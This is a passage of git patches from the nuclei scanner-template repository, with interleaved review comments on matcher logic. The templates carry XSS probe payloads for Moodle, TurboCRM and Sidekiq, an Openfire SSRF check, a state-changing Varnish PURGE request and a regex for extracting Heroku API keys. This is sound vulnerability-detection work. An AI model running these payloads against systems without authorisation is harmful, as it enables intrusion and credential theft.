From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 8 Apr 2021 21:53:33 +0530 Subject: [PATCH 28/79] final changes --- exposed-tokens/heroku/heroku-api-key.yaml | 17 ----------------- 1 file changed, 17 deletions(-) delete mode 100755 exposed-tokens/heroku/heroku-api-key.yaml diff --git a/exposed-tokens/heroku/heroku-api-key.yaml b/exposed-tokens/heroku/heroku-api-key.yaml deleted file mode 100755 index 93dea264d9..0000000000 --- a/exposed-tokens/heroku/heroku-api-key.yaml +++ /dev/null @@ -1,17 +0,0 @@ -id: heroku-api-key - -info: - name: Heroku API Key Disclosure - author: Ice3man - severity: info - tags: token - -requests: - - method: GET - path: - - "{{BaseURL}}" - extractors: - - type: regex - part: body - regex: - - '(?i)(?:heroku_api_key|heroku_api_token|heroku_api_secret|heroku_key|heroku_token|heroku_auth|herokuAuth|heroku_auth_token)[\W|\s]{1,10([0-9a-fA-F]{8}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{12}' \ No newline at end of file From 32b7f6e80111e584594c1b1281287d4676a8e671 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 8 Apr 2021 16:26:34 +0000 Subject: [PATCH 29/79] Auto Update README [Thu Apr 8 16:26:34 UTC 2021] :robot: --- README.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index e0281d7bc2..72d2c92faa 100644 --- a/README.md +++ b/README.md 
@@ -38,12 +38,12 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | | cves | 266 | vulnerabilities | 120 | exposed-panels | 117 | -| takeovers | 67 | exposures | 66 | technologies | 60 | +| takeovers | 67 | exposures | 67 | technologies | 60 | | misconfiguration | 55 | workflows | 27 | miscellaneous | 20 | -| default-logins | 21 | exposed-tokens | 9 | dns | 8 | +| default-logins | 21 | exposed-tokens | 33 | dns | 8 | | fuzzing | 7 | helpers | 6 | iot | 11 | -**82 directories, 892 files**. +**95 directories, 917 files**. From 521763c1a4b27d7f60ecb72a1e29c70b41e8eac3 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 8 Apr 2021 16:39:36 +0000 Subject: [PATCH 30/79] Auto Update README [Thu Apr 8 16:39:36 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 72d2c92faa..b38d5f299a 100644 --- a/README.md +++ b/README.md @@ -38,12 +38,12 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | | cves | 266 | vulnerabilities | 120 | exposed-panels | 117 | -| takeovers | 67 | exposures | 67 | technologies | 60 | +| takeovers | 67 | exposures | 68 | technologies | 60 | | misconfiguration | 55 | workflows | 27 | miscellaneous | 20 | | default-logins | 21 | exposed-tokens | 33 | dns | 8 | | fuzzing | 7 | helpers | 6 | iot | 11 | -**95 directories, 917 files**. +**95 directories, 918 files**. From f32ed958eea5a4d6bd5450a4a32b977aac39db16 Mon Sep 17 00:00:00 2001 
From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 8 Apr 2021 22:19:08 +0530 Subject: [PATCH 31/79] Update somfy-login.yaml --- exposed-panels/somfy-login.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/somfy-login.yaml b/exposed-panels/somfy-login.yaml index 9e43ef1ec2..61c85d3773 100644 --- a/exposed-panels/somfy-login.yaml +++ b/exposed-panels/somfy-login.yaml @@ -16,7 +16,7 @@ requests: - type: word words: - Home motion by Somfy - condition: and + - type: status status: - 200 From d3a173053980c592a61fe6b717743f7507e4fdb5 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 8 Apr 2021 16:49:48 +0000 Subject: [PATCH 32/79] Auto Update README [Thu Apr 8 16:49:48 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index b38d5f299a..a2c5cad4a3 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 266 | vulnerabilities | 120 | exposed-panels | 117 | +| cves | 266 | vulnerabilities | 120 | exposed-panels | 118 | | takeovers | 67 | exposures | 68 | technologies | 60 | | misconfiguration | 55 | workflows | 27 | miscellaneous | 20 | | default-logins | 21 | exposed-tokens | 33 | dns | 8 | | fuzzing | 7 | helpers | 6 | iot | 11 | -**95 directories, 918 files**. +**95 directories, 919 files**. From 4f2f682cb4631136b3b7a754ba48a2a99c245ad2 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 8 Apr 2021 22:23:50 +0530 Subject: [PATCH 33/79] minor fix --- exposures/configs/coremail-config-disclosure.yaml | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) 
diff --git a/exposures/configs/coremail-config-disclosure.yaml b/exposures/configs/coremail-config-disclosure.yaml index 394ce246de..ef50811b27 100644 --- a/exposures/configs/coremail-config-disclosure.yaml +++ b/exposures/configs/coremail-config-disclosure.yaml @@ -1,4 +1,5 @@ id: coremail-config-disclosure + info: name: Coremail Config Disclosure author: princechaddha @@ -10,12 +11,17 @@ requests: - method: GET path: - '{{BaseURL}}/mailsms/s?func=ADMIN:appState&dumpConfig=/' + matchers-condition: and matchers: - type: word words: - "" - 'containerDefinitions' + - 'coremail' + - '' + condition: or + - type: status status: - - 302 + - 200 From ef9e95eb96b2b3aa71457d96fca73f1aac0bf039 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 8 Apr 2021 16:55:25 +0000 Subject: [PATCH 34/79] Auto Update README [Thu Apr 8 16:55:25 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index a2c5cad4a3..094a100295 100644 --- a/README.md +++ b/README.md @@ -38,12 +38,12 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | | cves | 266 | vulnerabilities | 120 | exposed-panels | 118 | -| takeovers | 67 | exposures | 68 | technologies | 60 | +| takeovers | 67 | exposures | 69 | technologies | 60 | | misconfiguration | 55 | workflows | 27 | miscellaneous | 20 | | default-logins | 21 | exposed-tokens | 33 | dns | 8 | | fuzzing | 7 | helpers | 6 | iot | 11 | -**95 directories, 919 files**. +**95 directories, 920 files**. From 3b300d065848894e41aa8a9e4d02bb748ab96eb9 Mon Sep 17 00:00:00 2001 
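Review bot: As rendered here the new words list contains two empty entries (`- ""` and `- ''`) next to `containerDefinitions` and `coremail` under `condition: or`; if those were real values such as XML tags stripped by the page extraction this is moot, but if the template genuinely carries empty strings, an empty word is contained in every body, the word matcher always passes and the 200 status check becomes the only gate. Please confirm the actual entries and drop any empty ones. `coremail` alone is also a weak discriminator on a Coremail host, so consider keeping `containerDefinitions` as a required term rather than one of several `or` alternatives.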
From: GitHub Action Date: Thu, 8 Apr 2021 16:58:22 +0000 Subject: [PATCH 35/79] Auto Update README [Thu Apr 8 16:58:22 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 094a100295..ea76460bcb 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 266 | vulnerabilities | 120 | exposed-panels | 118 | +| cves | 267 | vulnerabilities | 120 | exposed-panels | 118 | | takeovers | 67 | exposures | 69 | technologies | 60 | | misconfiguration | 55 | workflows | 27 | miscellaneous | 20 | | default-logins | 21 | exposed-tokens | 33 | dns | 8 | | fuzzing | 7 | helpers | 6 | iot | 11 | -**95 directories, 920 files**. +**95 directories, 921 files**. From 76bcf58d1bd7d9207b8d90b7d5137a1ff0a96131 Mon Sep 17 00:00:00 2001 From: SaN ThosH <25719480+Mad-robot@users.noreply.github.com> Date: Thu, 8 Apr 2021 22:55:01 +0530 Subject: [PATCH 36/79] Update google-api-key.yaml --- exposed-tokens/google/google-api-key.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposed-tokens/google/google-api-key.yaml b/exposed-tokens/google/google-api-key.yaml index 96f7b78c72..6d832ebfb4 100644 --- a/exposed-tokens/google/google-api-key.yaml +++ b/exposed-tokens/google/google-api-key.yaml @@ -10,6 +10,7 @@ requests: - method: GET path: - "{{BaseURL}}" + - "{{BaseURL}}/hopfully404" extractors: - type: regex From 275380fc1fdefb3486cef93f5ed272b0f2920336 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 8 Apr 2021 23:47:41 +0530 Subject: [PATCH 37/79] FAQ link update --- README.md | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) 
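Review bot: The added path `{{BaseURL}}/hopfully404` has no comment explaining it and a typo in the slug; presumably the second request deliberately targets a non-existent path so that API keys embedded in a custom 404/error page are scanned as well. Suggest `# intentionally non-existent path: also scan the custom 404/error page for keys` above that entry and spelling it `/hopefully404` (or a clearly random slug) so the intent is obvious to the next reader.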
diff --git a/README.md b/README.md index ea76460bcb..581d4ef04a 100644 --- a/README.md +++ b/README.md @@ -18,7 +18,8 @@ Nuclei Templates ContributionsDiscussionCommunity • - Join Discord + FAQs • + Join Discord

---- From 5d703c2eb085c46570942aa0b06b9babd3352f32 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 8 Apr 2021 18:18:09 +0000 Subject: [PATCH 38/79] Auto Update README [Thu Apr 8 18:18:09 UTC 2021] :robot: --- README.md | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/README.md b/README.md index 581d4ef04a..ea76460bcb 100644 --- a/README.md +++ b/README.md @@ -18,8 +18,7 @@ Nuclei Templates ContributionsDiscussionCommunity • - FAQs • - Join Discord + Join Discord

---- From 3cd11581b9bc561ecf9d0b275911e15ba58e6a71 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 8 Apr 2021 23:48:26 +0530 Subject: [PATCH 39/79] readme update --- .github/scripts/README.tmpl | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/.github/scripts/README.tmpl b/.github/scripts/README.tmpl index c359879dd6..b2355df298 100644 --- a/.github/scripts/README.tmpl +++ b/.github/scripts/README.tmpl @@ -18,7 +18,8 @@ Nuclei Templates ContributionsDiscussionCommunity • - Join Discord + FAQs • + Join Discord

---- From 8a5fb193ff7387dcca2ae72c90fd4aa36d60648f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 8 Apr 2021 18:19:00 +0000 Subject: [PATCH 40/79] Auto Update README [Thu Apr 8 18:19:00 UTC 2021] :robot: --- README.md | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/README.md b/README.md index ea76460bcb..581d4ef04a 100644 --- a/README.md +++ b/README.md @@ -18,7 +18,8 @@ Nuclei Templates ContributionsDiscussionCommunity • - Join Discord + FAQs • + Join Discord

---- From 0b746c97c23c5f02de9b9c117e47a0af7935a2fc Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Fri, 9 Apr 2021 13:13:36 +0530 Subject: [PATCH 41/79] Added additional check to avoid possible false positive --- cves/2018/CVE-2018-0101.yaml | 12 +++++++++++- 1 file changed, 11 insertions(+), 1 deletion(-) diff --git a/cves/2018/CVE-2018-0101.yaml b/cves/2018/CVE-2018-0101.yaml index 8448e3c2f6..f92d64a488 100644 --- a/cves/2018/CVE-2018-0101.yaml +++ b/cves/2018/CVE-2018-0101.yaml @@ -35,6 +35,11 @@ requests: A + - | + GET / HTTP/1.1 + Host: {{Hostname}} + Accept: */* + req-condition: true matchers-condition: and matchers: @@ -49,4 +54,9 @@ requests: - "status_code_2 == 502" - "status_code_2 == 503" - "status_code_2 == 504" - condition: or \ No newline at end of file + condition: or + + - type: dsl + dsl: + - "status_code_3 == 200" + negative: true \ No newline at end of file From d605f09072fedadea6205765e063213f469793a5 Mon Sep 17 00:00:00 2001 From: Khaled Mohamed <46958133+xElkomy@users.noreply.github.com> Date: Fri, 9 Apr 2021 13:51:58 +0200 Subject: [PATCH 42/79] Create varnish-cache.yaml --- vulnerabilities/varnish-cache.yaml | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) create mode 100644 vulnerabilities/varnish-cache.yaml diff --git a/vulnerabilities/varnish-cache.yaml b/vulnerabilities/varnish-cache.yaml new file mode 100644 index 0000000000..3188c09dbe --- /dev/null +++ b/vulnerabilities/varnish-cache.yaml @@ -0,0 +1,17 @@ +id: vanish-detect +info: + name: Vanish Cache Detection + author: 0xelkomy + severity: low + # https://stackoverflow.com/questions/41480688/what-is-the-difference-between-bans-and-purge-in-varnish-http-cache +requests: + - raw: + - | + PURGE / HTTP/1.1 + + matchers: + - type: dsl + name: multi-req + dsl: + - 'contains(body_1, "200 Purged") == true' + req-condition: true From a42a6fac90dffa3f34d0f83603e71f95d3e5457c Mon Sep 17 00:00:00 2001 
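Review bot: The new third request's guard `status_code_3 == 200` with `negative: true` treats any non-200 answer from `GET /` as confirmation that the device is down, so a host that normally answers `/` with a redirect, 401 or 404 still passes and the false positive this commit targets is only partly closed. A positive condition on the failure codes already used for request 2 is tighter: `- "status_code_3 == 502 || status_code_3 == 503 || status_code_3 == 504"` without `negative`, or at least a comment explaining why non-200 is an acceptable proxy. The requests list and the first matchers begin outside this hunk, so I cannot see how request 1 feeds `req-condition` here.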
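Review bot: The raw request `PURGE / HTTP/1.1` carries no `Host: {{Hostname}}` line, unlike the raw request added to CVE-2018-0101 in this same series; HTTP/1.1 requires Host and a Varnish fronting several backends cannot route the purge without it, so add `Host: {{Hostname}}` directly after the request line. `id: vanish-detect` and `name: Vanish Cache Detection` misspell Varnish (the file is varnish-cache.yaml), and the matcher name `multi-req` is on a single-request template. A comment should also state that this check is state-changing: a `200 Purged` response means the template just evicted the target's cached `/` object, which is precisely the unrestricted-purge ACL misconfiguration being detected, so `# intrusive: sends a real PURGE` next to the raw block is appropriate.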
From: Khaled Mohamed <46958133+xElkomy@users.noreply.github.com> Date: Fri, 9 Apr 2021 13:54:40 +0200 Subject: [PATCH 43/79] Update varnish-cache.yaml --- vulnerabilities/varnish-cache.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/vulnerabilities/varnish-cache.yaml b/vulnerabilities/varnish-cache.yaml index 3188c09dbe..2a83f05ffd 100644 --- a/vulnerabilities/varnish-cache.yaml +++ b/vulnerabilities/varnish-cache.yaml @@ -3,7 +3,6 @@ info: name: Vanish Cache Detection author: 0xelkomy severity: low - # https://stackoverflow.com/questions/41480688/what-is-the-difference-between-bans-and-purge-in-varnish-http-cache requests: - raw: - | From ab46a9b2f0feba9f566793124626f4a224c25e40 Mon Sep 17 00:00:00 2001 From: Gal Nagli <35578316+NagliNagli@users.noreply.github.com> Date: Sat, 10 Apr 2021 01:01:09 +0300 Subject: [PATCH 44/79] Update basic-cors.yaml Severity should be info. --- vulnerabilities/generic/basic-cors.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/generic/basic-cors.yaml b/vulnerabilities/generic/basic-cors.yaml index 7c57f945b8..a224186e83 100644 --- a/vulnerabilities/generic/basic-cors.yaml +++ b/vulnerabilities/generic/basic-cors.yaml @@ -3,7 +3,7 @@ id: basic-cors-misconfig info: name: Basic CORS misconfiguration author: nadino - severity: low + severity: info tags: cors requests: From 8e5c1150a84973880c9756355889c87e6e8471c5 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 10 Apr 2021 03:49:09 +0530 Subject: [PATCH 45/79] Update CVE-2019-18394.yaml --- cves/2019/CVE-2019-18394.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2019/CVE-2019-18394.yaml b/cves/2019/CVE-2019-18394.yaml index 9a0e8d64af..5bd99f4581 100644 --- a/cves/2019/CVE-2019-18394.yaml +++ b/cves/2019/CVE-2019-18394.yaml 
@@ -2,7 +2,7 @@ id: CVE-2019-18394 info: name: Openfire Full Read SSRF - author: pdteam - nuclei.projectdiscovery.io + author: pdteam severity: critical description: A Server Side Request Forgery (SSRF) vulnerability in FaviconServlet.java in Ignite Realtime Openfire through 4.4.2 allows attackers to send arbitrary HTTP GET requests. refrense: | @@ -17,4 +17,4 @@ requests: matchers: - type: word words: - -

Burp Collaborator Server

\ No newline at end of file + -

Burp Collaborator Server
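Review bot: The `refrense: |` key visible as context at the top of the first hunk is a misspelling of `reference`, and as far as I know nuclei ignores unknown `info` keys rather than rejecting them, so the referenced URLs are silently dropped from the template's metadata; rename it to `reference:` while this file is being touched. The second hunk's matcher word is garbled in this rendering (the markup around `Burp Collaborator Server` appears stripped), so I cannot tell whether the string itself changed beyond the trailing newline. If it is the Collaborator landing-page text, the check only works against an unmodified Collaborator instance and that limitation is worth a `description` sentence; the author-line change itself is fine.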

From b36ec072d625312923cf38d60795f0e2d7805a7e Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Sat, 10 Apr 2021 13:10:29 +0530 Subject: [PATCH 46/79] template update --- .nuclei-ignore | 1 + vulnerabilities/moodle/moodle-jitsi-plugin-xss.yaml | 4 ++-- 2 files changed, 3 insertions(+), 2 deletions(-) diff --git a/.nuclei-ignore b/.nuclei-ignore index 32e6f022f1..207ece0f9c 100644 --- a/.nuclei-ignore +++ b/.nuclei-ignore @@ -13,6 +13,7 @@ tags: - "iot" - "misc" - "fuzz" + - "revision" # files is a list of files to ignore template execution # unless asked for by the user. \ No newline at end of file diff --git a/vulnerabilities/moodle/moodle-jitsi-plugin-xss.yaml b/vulnerabilities/moodle/moodle-jitsi-plugin-xss.yaml index 3b5133b47f..00843f0d3f 100644 --- a/vulnerabilities/moodle/moodle-jitsi-plugin-xss.yaml +++ b/vulnerabilities/moodle/moodle-jitsi-plugin-xss.yaml @@ -5,13 +5,13 @@ info: author: aceseven (digisec360) description: Cross-site Scripting in moodle jitsi plugin severity: medium - tags: moodle,jitsi,xss + tags: moodle,jitsi,xss,revision reference: https://github.com/udima-university/moodle-mod_jitsi/issues/67 requests: - method: GET path: - - "{{BaseURL}}/mod/jitsi/sessionpriv.php?avatar=https%3A%2F%2Ftargetdomain.com%2Fuser%2Fpix.php%2F498%2Ff1.jpg&nom=test_user%27)%3balert(document.domain)%3b//&ses=test_user&t=1" + - "{{BaseURL}}/mod/jitsi/sessionpriv.php?avatar=https%3A%2F%2F{{Hostname}}%2Fuser%2Fpix.php%2F498%2Ff1.jpg&nom=test_user%27)%3balert(document.domain)%3b//&ses=test_user&t=1" matchers-condition: and matchers: From e176461addc846b3ef9d4c00be5a2881b629b310 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Sat, 10 Apr 2021 13:32:24 +0000 Subject: [PATCH 47/79] Create laravel-telescope.yaml --- exposures/logs/laravel-telescope.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 exposures/logs/laravel-telescope.yaml 
diff --git a/exposures/logs/laravel-telescope.yaml b/exposures/logs/laravel-telescope.yaml new file mode 100644 index 0000000000..01854df18c --- /dev/null +++ b/exposures/logs/laravel-telescope.yaml @@ -0,0 +1,24 @@ +id: laravel-telescope + +info: + name: Laravel Telescope Disclosure + author: geeknik + description: Telescope provides insight into the requests coming into your application, exceptions, log entries, database queries, queued jobs, mail, notifications, cache operations, scheduled tasks, variable dumps, and more. + reference: https://laravel.com/docs/8.x/telescope + severity: medium + tags: laravel,disclosure + +requests: + - method: GET + path: + - "{{BaseURL}}/telescope/requests" + + redirects: true + matchers: + - type: word + words: + - "Telescope" + - "Requests" + - "Commands" + - "Schedule" + condition: and From e87a0671ee6e2911430cbdf3ff1f580cad636084 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 10 Apr 2021 22:58:27 +0530 Subject: [PATCH 48/79] Create CVE-2021-30151.yaml --- cves/2021/CVE-2021-30151.yaml | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 cves/2021/CVE-2021-30151.yaml diff --git a/cves/2021/CVE-2021-30151.yaml b/cves/2021/CVE-2021-30151.yaml new file mode 100644 index 0000000000..ece49be0ea --- /dev/null +++ b/cves/2021/CVE-2021-30151.yaml @@ -0,0 +1,28 @@ +id: CVE-2021-30151 + +info: + name: CVE-2021-30151 + author: DhiyaneshDk + severity: low + description: | + Sidekiq through 5.1.3 and 6.x through 6.2.0 allows XSS via the queue name of the live-poll feature when Internet Explorer is used. + reference: | + - https://github.com/mperham/sidekiq/issues/4852 + - + tags: cve,cve2021,xss + +requests: + - method: GET + path: + - '{{BaseURL}}/sidekiq/queues/"onmouseover="alert('nuclei')"' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "onmouseover="alert('nuclei')" + - type: word + part: header + words: + - "text/html" 
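Review bot: The matcher block in the new template has no status check while `redirects: true` is set, so a redirect from `/telescope/requests` to a login or error page that happens to contain "Telescope", "Requests", "Commands" and "Schedule" would be reported as an exposure; add `matchers-condition: and` plus a `- type: status` matcher with `- 200` to pin the reachable dashboard itself. The `description` is the product blurb and does not say what the finding means — suggest `description: Laravel Telescope dashboard is reachable without authentication. It records incoming requests, exceptions, log entries, database queries, queued jobs, mail and variable dumps, so public exposure leaks application internals and potentially credentials.` Given what Telescope records, `medium` is arguably conservative, but that is a judgement call for the maintainers.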
From 3e3db1c972df90dcec41f4767ab5335c5e618492 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 10 Apr 2021 23:37:38 +0530 Subject: [PATCH 49/79] Update CVE-2021-30151.yaml --- cves/2021/CVE-2021-30151.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-30151.yaml b/cves/2021/CVE-2021-30151.yaml index ece49be0ea..05462a7be6 100644 --- a/cves/2021/CVE-2021-30151.yaml +++ b/cves/2021/CVE-2021-30151.yaml @@ -8,7 +8,7 @@ info: Sidekiq through 5.1.3 and 6.x through 6.2.0 allows XSS via the queue name of the live-poll feature when Internet Explorer is used. reference: | - https://github.com/mperham/sidekiq/issues/4852 - - + - https://nvd.nist.gov/vuln/detail/CVE-2021-30151 tags: cve,cve2021,xss requests: From 1e0b6ea3839c5c2487d8865aec6030e02531ee46 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 10 Apr 2021 23:43:37 +0530 Subject: [PATCH 50/79] Update CVE-2021-30151.yaml --- cves/2021/CVE-2021-30151.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-30151.yaml b/cves/2021/CVE-2021-30151.yaml index 05462a7be6..b9f5a033f8 100644 --- a/cves/2021/CVE-2021-30151.yaml +++ b/cves/2021/CVE-2021-30151.yaml @@ -14,7 +14,7 @@ info: requests: - method: GET path: - - '{{BaseURL}}/sidekiq/queues/"onmouseover="alert('nuclei')"' + - '{{BaseURL}}/sidekiq/queues/%22onmouseover%3D%22alert(%27nuclei%27)%22' matchers-condition: and matchers: From 1692ef18218026572b5566e1427cbaf7cb257677 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 10 Apr 2021 23:47:02 +0530 Subject: [PATCH 51/79] Update CVE-2021-30151.yaml --- cves/2021/CVE-2021-30151.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-30151.yaml b/cves/2021/CVE-2021-30151.yaml index b9f5a033f8..0fed61b3c7 100644 --- a/cves/2021/CVE-2021-30151.yaml +++ b/cves/2021/CVE-2021-30151.yaml 
@@ -14,8 +14,7 @@ info: requests: - method: GET path: - - '{{BaseURL}}/sidekiq/queues/%22onmouseover%3D%22alert(%27nuclei%27)%22' - + - '{{BaseURL}}/sidekiq/queues/"onmouseover="alert(nuclei)"' matchers-condition: and matchers: - type: word From 4c9cbc169234a9dabc65b0a370ecc277194b4cc9 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 11 Apr 2021 00:57:38 +0530 Subject: [PATCH 52/79] Update CVE-2021-30151.yaml --- cves/2021/CVE-2021-30151.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-30151.yaml b/cves/2021/CVE-2021-30151.yaml index 0fed61b3c7..4f78422672 100644 --- a/cves/2021/CVE-2021-30151.yaml +++ b/cves/2021/CVE-2021-30151.yaml @@ -5,7 +5,7 @@ info: author: DhiyaneshDk severity: low description: | - Sidekiq through 5.1.3 and 6.x through 6.2.0 allows XSS via the queue name of the live-poll feature when Internet Explorer is used. + - Sidekiq through 5.1.3 and 6.x through 6.2.0 allows XSS via the queue name of the live-poll feature when Internet Explorer is used. reference: | - https://github.com/mperham/sidekiq/issues/4852 - https://nvd.nist.gov/vuln/detail/CVE-2021-30151 From 43e59a577e16769d0809b2fd9c06eac6924dbda4 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 11 Apr 2021 01:00:49 +0530 Subject: [PATCH 53/79] Update CVE-2021-30151.yaml --- cves/2021/CVE-2021-30151.yaml | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/cves/2021/CVE-2021-30151.yaml b/cves/2021/CVE-2021-30151.yaml index 4f78422672..f9fc1c8820 100644 --- a/cves/2021/CVE-2021-30151.yaml +++ b/cves/2021/CVE-2021-30151.yaml 
@@ -4,8 +4,7 @@ info: name: CVE-2021-30151 author: DhiyaneshDk severity: low - description: | - - Sidekiq through 5.1.3 and 6.x through 6.2.0 allows XSS via the queue name of the live-poll feature when Internet Explorer is used. + description: Sidekiq through 5.1.3 and 6.x through 6.2.0 allows XSS via the queue name of the live-poll feature when Internet Explorer is used. reference: | - https://github.com/mperham/sidekiq/issues/4852 - https://nvd.nist.gov/vuln/detail/CVE-2021-30151 @@ -20,7 +19,7 @@ requests: - type: word part: body words: - - "onmouseover="alert('nuclei')" + - "onmouseover=\"alert('nuclei')" - type: word part: header words: From cdac8b34a6470d52ccd884d9bf0fd990b6852c30 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Sun, 11 Apr 2021 00:22:56 +0000 Subject: [PATCH 54/79] Create turbocrm-xss.yaml --- vulnerabilities/other/turbocrm-xss.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 vulnerabilities/other/turbocrm-xss.yaml diff --git a/vulnerabilities/other/turbocrm-xss.yaml b/vulnerabilities/other/turbocrm-xss.yaml new file mode 100644 index 0000000000..ade2003039 --- /dev/null +++ b/vulnerabilities/other/turbocrm-xss.yaml @@ -0,0 +1,25 @@ +id: turbocrm-xss + +info: + name: TurboCRM XSS + author: pikpikcu + severity: medium + reference: https://gist.github.com/pikpikcu/9689c5220abbe04d4927ffa660241b4a + tags: xss,turbocrm + +requests: + - method: GET + path: + - '{{BaseURL}}/login/forgetpswd.php?loginsys=1&orgcode=%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E&loginname=%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E' + + matchers-condition: and + matchers: + + - type: word + words: + - '">' + part: body + + - type: status + status: + - 200 From b0595790cb86458f037e37d7077ad237e844f430 Mon Sep 17 00:00:00 2001 
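Review bot: The corrected matcher in the second hunk, `onmouseover=\"alert('nuclei')`, no longer agrees with the request path: since PATCH 51 the path sends `"onmouseover="alert(nuclei)"` without the inner quotes, so a Sidekiq instance that reflects the queue name as-is (which is what this body matcher relies on) returns `alert(nuclei)` and the word never matches. Use one payload on both sides — either restore the quoted form in the path, written so YAML accepts it, `- "{{BaseURL}}/sidekiq/queues/\"onmouseover=\"alert('nuclei')\""`, or change the matcher to `- "onmouseover=\"alert(nuclei)"`. Whichever is chosen, a body-only word match will also fire on an error page that echoes the raw path, so the `text/html` header check below it should stay.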
From: LuskaBol <73140480+LuskaBol@users.noreply.github.com> Date: Sat, 10 Apr 2021 22:27:51 -0300 Subject: [PATCH 55/79] Rename vulnerabilities/rockethcat/unauth-message-read.yaml to vulnerabilities/rocketchat/unauth-message-read.yaml --- .../{rockethcat => rocketchat}/unauth-message-read.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename vulnerabilities/{rockethcat => rocketchat}/unauth-message-read.yaml (98%) diff --git a/vulnerabilities/rockethcat/unauth-message-read.yaml b/vulnerabilities/rocketchat/unauth-message-read.yaml similarity index 98% rename from vulnerabilities/rockethcat/unauth-message-read.yaml rename to vulnerabilities/rocketchat/unauth-message-read.yaml index 8b782186a1..981b5ee0e5 100644 --- a/vulnerabilities/rockethcat/unauth-message-read.yaml +++ b/vulnerabilities/rocketchat/unauth-message-read.yaml @@ -45,4 +45,4 @@ requests: - '"{\"msg\":\"result\",\"result\":{\"messages\"' - '"success":true' part: body - condition: and \ No newline at end of file + condition: and From a4ffb88b17e5692e638c24a29a33dc0457775dd1 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Sun, 11 Apr 2021 15:49:26 +0530 Subject: [PATCH 